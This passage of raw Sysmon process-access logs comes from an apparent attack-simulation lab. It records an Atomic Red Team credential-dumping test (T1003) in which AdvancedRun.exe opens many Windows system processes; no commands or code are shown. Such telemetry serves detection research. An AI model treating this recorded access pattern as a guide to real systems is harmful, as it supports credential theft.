dvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003980042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 